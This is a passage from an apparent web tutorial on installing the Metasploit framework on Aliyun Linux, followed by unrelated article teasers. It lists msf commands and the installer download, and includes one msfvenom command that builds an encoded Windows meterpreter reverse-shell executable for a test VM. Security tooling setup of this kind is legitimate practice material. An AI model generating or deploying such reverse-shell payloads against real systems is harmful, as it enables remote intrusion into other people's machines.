Or write down the installation process yourself! My server system is Aliyun linux
#Related commands [msf@xxxx root]$ msf msfbinscan msfconsole msfd msfdb msfelfscan msfmachscan msfpescan msfrop msfrpc msfrpcd msfupdate msfvenom # Database initialization [msf@xxxx root]$ msfdb Commands: init initializes the component reinit delete and reinitialize the component delete delete and stop the component status check component status start start the component stop stop the component restart restart the component #test: For example, my virtual host is Win2003 (target machine) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=msf_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > test.exe Note: If it is an elastic cloud server IP, LHOST should be set to the IP allocated by the intranet, and the public IP cannot be set [I was troubled by this pit for a long time! ! ! Vomiting blood! ! ! ] ps: Install msf framework under Linux system Order: wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run chmod 755 metasploit-latest-linux-installer.run ./metasploit-latest-linux-installer.run Just wait for the run to finish. Just press Enter and Y at the key points. Summarize This is the end of this article about the detailed process of installing msf on Linux system. For more relevant content about installing msf on Linux system, please search the previous articles of 123WORDPRESS.COM or continue to browse the related articles below. I hope everyone will support 123WORDPRESS.COM in the future! You may also be interested in:
|
<<: Self-study of MySql built-in functions knowledge points summary
>>: Tutorial on installing mysql8 on linux centos7
With the emergence of docker, many services have ...
Preface We already know that MySQL uses the SQL S...
Table of contents 1. Modify by binding the style ...
Recently, I used the webSocket protocol when work...
What does linux cd mean? In Linux, cd means chang...
Table of contents 1. Background 2. What is a virt...
An event is an action performed by the user or th...
The insignificant flex-basis has caused a lot of ...
Real-time replication is the most important way t...
The configuration is very simple, but I have to c...
This article lists some tips and codes about form...
Table of contents 1. Replace the apply method, ge...
Table of contents Case Context switching overhead...
Uninstall MariaDB CentOS7 installs MariaDB instea...
Overview Volume is the abstraction and virtualiza...